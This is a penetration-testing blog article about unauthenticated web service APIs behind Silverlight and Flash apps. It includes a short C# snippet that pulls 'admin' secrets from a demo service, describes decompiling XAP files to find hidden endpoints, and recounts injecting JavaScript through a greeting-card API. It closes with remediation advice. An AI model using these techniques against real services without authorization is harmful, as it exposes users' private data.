Cloud Security Authors: Elizabeth White, Pat Romanski, Zakia Bouachraoui, Yeshim Deniz, Liz McMillan

Related Topics: Microservices Expo, Java IoT, Microsoft Cloud, Silverlight, Cloud Security

Microservices Expo: Article

Any Means Possible: Tales from Penetration Testing

Problems centered on web service APIs can potentially be just as dangerous as an SQLi vulnerability

When we aren't fighting crime, taking over the world, or enjoying a good book by the fire, we here on the eEye Research team like to participate in the Any Means Possible (AMP) Penetration Testing engagements with our clients. For us, it's a great way to interact one-on-one with IT folks and really dig into the security problems that they are facing. We can sharpen our skills with real-world scenarios and practice the academic techniques presented in the industry, all the while helping to connect better with our customers and identify their security needs. During these engagements, we target a number of attack surfaces, ranging from exposed external server interfaces to client-side attacks launched on individual workstations. What I would like to talk about today is centered purely on the web-based attack surface, with a common problem we see consistently during our AMP engagements.

When talking about web vulnerabilities, you can't even begin to breach the subject without someone throwing out Cross-Site Scripting (XSS) or SQL Injection (SQLi). Unfortunately, poor little web services never seem to get any attention in the mix. Web service vulnerabilities are arguably just as widespread and dangerous as the aforementioned classes of vulnerabilities, but with so little talk and discussion around them, very rarely are these issues identified and remediated. Let's fix that.

Vulnerabilities in web services stem from the developer's line of thinking that says "I can trust the input from programs that I write." It's true that in some situations data coming from a known source that you wrote can sometimes be trusted. This is not however true when that data communication travels over an untrusted medium, such as the Internet. A common mistake in web design and development that we still see frequently is a server relying on input that was parsed and filtered by the client's browser. An example of such would be JavaScript running in the browser that is doing all of the filtering for malicious characters. Surely the JavaScript has filtered out all characters that could allow an attacker to insert malicious SQL queries into the back-end SQL Database, right? Wrong, any data that the server receives from a client's browser can be sent directly to the server from another, custom-written, application. This means that an attacker can bypass server-provided client-side SQLi and XSS protections by simply sending the queries directly to the server. When traveling over the Internet, it becomes quite difficult to determine the exact means in which the data was sent; it may have never been sent from the application that you intended it to be sent from. This makes exploitation of these vulnerabilities a bit more obscure, but still possible. The same holds true for web service APIs used by client-side applications.

Figure 1: Demo Microsoft Silverlight application. The left is a failed attempt to login and reveal the user's secret data, the right is a successful login.

Many browser applications, such as Adobe Flash and Microsoft Silverlight, communicate back to the server programmatically using web services. These services are exposed interfaces on the server that can be called directly from custom-written applications. In many situations, these services can expose potentially sensitive and privileged information that would otherwise not be accessible. Figure 1 shows a Microsoft Silverlight application that was constructed for demonstration purposes. This application is not vulnerable to XSS or SQLi and, to the average user, there is nothing about this application that allows someone without a password to access the legitimate user's secret data. However, what a lot of people don't seem to take into consideration is that you have access to anything that is running in your browser. Now, we can't pull the entire project down off of the server, but we can reverse-engineer the application interface running in the browser to see if there is anything potentially sensitive that is being exposed.

The first thing that should be done when auditing web sites is to make sure all requests are being logged through a local request proxy. For this example, I will be using Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/) to log all of the requests that FireFox makes to our target Silverlight application. Right away, we see that the application requests an XAP file, shown in Figure 2. This is a fun thing to play around with that I will come back to later. As soon as we click the button on the page, we see the browser make a request to an SVC file; this is our web services interface and is also shown in Figure 2.

Figure 2: Browser makes requests for an XAP file and an SVC file. The XAP file is loaded immediately into the browser when the application is started and the SVC file is loaded as soon as the user attempts to submit data back to the server.

Now, when we find a site serving up an SVC web services file, it's usually game over for that particular site. The reason is that these interfaces are usually trusted by the developer. Developers will assume that the only thing calling these exposed interfaces is the client application that they wrote. However, browsing to the service file directly in your favorite web browser will usually show you the basic interface of the exposed web service. The next step is creating a custom application to interface with the web service directly. You can use any language that you want as long as it can interface with a web server, but I usually like to use C# in Visual Studio. Creating the application is quite easy - simply create a new C# project and add a service reference to the hosted SVC file. Visual Studio will automatically import all of the references to everything exposed by the service. Figure 3 shows what is exposed by the sample service.

Figure 3: Object Viewer's list of the imported Web Services interface.

This service exports two functions: GetUserSecret and Login. The interesting thing here is that GetUserSecret takes a string and gives back a string, likely representing the secret data associated with that provided user. Now, it's perfectly possible that there is some form of authentication check that happens on the server side when this function is called, which ensures no secrets are disclosed to unauthenticated clients. However, in many situations I have encountered, this is not the case. We can test if code is properly checking for authentication by writing our own custom interface for the exposed web service. The following code snippet instantiates a client and queries for the secret data of two users without first authenticating with the server. Figure 4 shows the output from that program.

LoginService.LoginServiceClient client = new LoginService.LoginServiceClient();
Console.WriteLine("eEyeResearch's secret: "+client.GetUserSecret("eEyeResearch"));
Console.WriteLine("admin's secret: " + client.GetUserSecret("admin"));

Figure 4: Output from the code written to call the example service directly.

The output from our code shows that this exposed service is callable directly, without requiring any authentication. The only information needed is the user's name and, as many of you know from attacks that have made the press over the past year, that information can be acquired through social engineering or brute force style attacks quite easily.

This vulnerability is quite straightforward, but I think many of you would be surprised how often we encounter issues very similar to this in real-world penetration testing scenarios. It's a fairly easy mistake to make, to assume that any malicious tampering of a web page would be done through a browser or front-end web application, but the simple truth is that this is not the case.

If you wanted to take this a bit further, you could examine the manifest files that are used by the client-side browser application. Remember the XAP file mentioned at the beginning? That file is actually a ZIP archive containing manifest information and binary executable files used by the Silverlight application. Examining these files will show you all of the web services APIs that the application can potentially call, even the authenticated ones. This information has proven to be quite useful on various engagements. A simple web application, that wasn't vulnerable to XSS or SQLi, revealed a manifest of previously unknown web services, which eventually allowed downloading all of the information hidden behind the login page. Because these services were only referenced after the user had authenticated through the login screen, these APIs may have never been found with a purely unauthenticated audit had the manifest files not been checked for additional exposed interfaces.

As if freely available manifest information wasn't enough, the DLL files presented in this archive can also prove to be a lot of fun. Ask any professional or hobby reverse-code engineer, languages such as Java or C# are quite easy to decompile. Due to the managed nature of such languages, there are actually freely available tools that do quite a good job of turning the compiled binaries back into the original (or very similar) high-level code. These DLLs only represent the client-side browser code that gets executed by Silverlight in the browser, so you won't be getting the original server code out of this. However, a very common mistake made by programmers is to incorporate some of the application logic into the user interface as well. In these situations, such reversing sessions may yield valuable information about how the application is working behind the scenes. In fact, this has been used in the past to gain all kinds of interesting information about target applications, including default credentials to the authenticated sections of the application, which were set in a button click-event handler of the application's user interface.

Though this entire article has been purely focused on Silverlight, the same concept applies to most other client-side web applications out there. Often times, these applications will rely on web services in order to communicate with the server, for both unauthenticated and authenticated communications alike. Developers often times rely on the client-side application to do all of the relevant filtering and data integrity checking of information being sent to these web services.

Along with authenticated actions on behalf of an unauthenticated application, we have used these service APIs to inject malicious data into hosted material. I think my favorite case with that was when we attacked a Flash application as part of an AMP engagement that called a web service API in the background. This API was used to lay text over greeting card images that were being hosted on the affected server. The Flash application filtered input to only allow alphanumeric characters but calling the API directly allowed us to insert malicious JavaScript to sit on top of the images. Upon viewing the page or the image link directly, we gained the ability to execute arbitrary JavaScript in the user's browser or embed hidden iFrames that could be used to host various exploits. The basic point here is that successful exploitation can yield a variety of things for the attacker. This isn't something that, when exploited, only dumps information or only changes the way a page is viewed; the limits of these vulnerabilities is only determined by the functionality of the web application.

Problems centered on web service APIs can potentially be just as dangerous as an SQLi vulnerability. It's somewhat unfortunate that SQLi has become so trendy, taking away any deserved fame or glory from the other interesting web vulnerabilities. It's important to keep in mind that, though this was a very heavily focused Microsoft and Silverlight example, the same issues apply across the board in many different web application technologies. The issue is actually very easy to audit for, especially if you already know exactly what your application should and shouldn't be able to do at every level of authentication.

I recommend if you manage servers hosting websites or you manage the websites that you take a few minutes to sit down and browse through each of these services. Be aware of exactly what is exposed on the external facing interfaces. If anything looks out of place, try connecting directly to the service and see what information is exposed and available to your users. Try preventing the service from displaying its metadata by removing the mex endpoint binding and setting httpGetEnabled for service metadata to false in the web configuration file. This prevents users from reading the web services descriptions and makes it nontrivial to arbitrarily connect and communicate with these services without prior knowledge of the internal workings of the application. These problems are quite easy to identify, potentially trivial to remediate, and can save an organization from a serious compromise if steps are taken to proactively identify and address these issues.

•   •   •

This article was written by Jared Day, a researcher with eEye's Research Team led by Marc Maiffret.

If you are interested in learning more about our AMP services, you can visit our page here (http://www.eeye.com/services/penetration-testing).

More Stories By Jared Day

Jared Day, Security Research Engineer, eEye Research Team. He joined the research team in 2010 and works primarily as a security advocate for eEye clients; participating and leading the Any Means Possible (AMP) Penetration Tests, as well as custom private research related to malware, threat, and patch mitigation analysis.

Comments (0)

Share your thoughts on this story.

Add your comment
You must be signed in to add a comment. Sign-in | Register

In accordance with our Comment Policy, we encourage comments that are on topic, relevant and to-the-point. We will remove comments that include profanity, personal attacks, racial slurs, threats of violence, or other inappropriate material that violates our Terms and Conditions, and will block users who make repeated violations. We ask all readers to expect diversity of opinion and to treat one another with dignity and respect.

IoT & Smart Cities Stories
The deluge of IoT sensor data collected from connected devices and the powerful AI required to make that data actionable are giving rise to a hybrid ecosystem in which cloud, on-prem and edge processes become interweaved. Attendees will learn how emerging composable infrastructure solutions deliver the adaptive architecture needed to manage this new data reality. Machine learning algorithms can better anticipate data storms and automate resources to support surges, including fully scalable GPU-c...
Machine learning has taken residence at our cities' cores and now we can finally have "smart cities." Cities are a collection of buildings made to provide the structure and safety necessary for people to function, create and survive. Buildings are a pool of ever-changing performance data from large automated systems such as heating and cooling to the people that live and work within them. Through machine learning, buildings can optimize performance, reduce costs, and improve occupant comfort by ...
The explosion of new web/cloud/IoT-based applications and the data they generate are transforming our world right before our eyes. In this rush to adopt these new technologies, organizations are often ignoring fundamental questions concerning who owns the data and failing to ask for permission to conduct invasive surveillance of their customers. Organizations that are not transparent about how their systems gather data telemetry without offering shared data ownership risk product rejection, regu...
René Bostic is the Technical VP of the IBM Cloud Unit in North America. Enjoying her career with IBM during the modern millennial technological era, she is an expert in cloud computing, DevOps and emerging cloud technologies such as Blockchain. Her strengths and core competencies include a proven record of accomplishments in consensus building at all levels to assess, plan, and implement enterprise and cloud computing solutions. René is a member of the Society of Women Engineers (SWE) and a m...
Poor data quality and analytics drive down business value. In fact, Gartner estimated that the average financial impact of poor data quality on organizations is $9.7 million per year. But bad data is much more than a cost center. By eroding trust in information, analytics and the business decisions based on these, it is a serious impediment to digital transformation.
Digital Transformation: Preparing Cloud & IoT Security for the Age of Artificial Intelligence. As automation and artificial intelligence (AI) power solution development and delivery, many businesses need to build backend cloud capabilities. Well-poised organizations, marketing smart devices with AI and BlockChain capabilities prepare to refine compliance and regulatory capabilities in 2018. Volumes of health, financial, technical and privacy data, along with tightening compliance requirements by...
Predicting the future has never been more challenging - not because of the lack of data but because of the flood of ungoverned and risk laden information. Microsoft states that 2.5 exabytes of data are created every day. Expectations and reliance on data are being pushed to the limits, as demands around hybrid options continue to grow.
Digital Transformation and Disruption, Amazon Style - What You Can Learn. Chris Kocher is a co-founder of Grey Heron, a management and strategic marketing consulting firm. He has 25+ years in both strategic and hands-on operating experience helping executives and investors build revenues and shareholder value. He has consulted with over 130 companies on innovating with new business models, product strategies and monetization. Chris has held management positions at HP and Symantec in addition to ...
Enterprises have taken advantage of IoT to achieve important revenue and cost advantages. What is less apparent is how incumbent enterprises operating at scale have, following success with IoT, built analytic, operations management and software development capabilities - ranging from autonomous vehicles to manageable robotics installations. They have embraced these capabilities as if they were Silicon Valley startups.
As IoT continues to increase momentum, so does the associated risk. Secure Device Lifecycle Management (DLM) is ranked as one of the most important technology areas of IoT. Driving this trend is the realization that secure support for IoT devices provides companies the ability to deliver high-quality, reliable, secure offerings faster, create new revenue streams, and reduce support costs, all while building a competitive advantage in their markets. In this session, we will use customer use cases...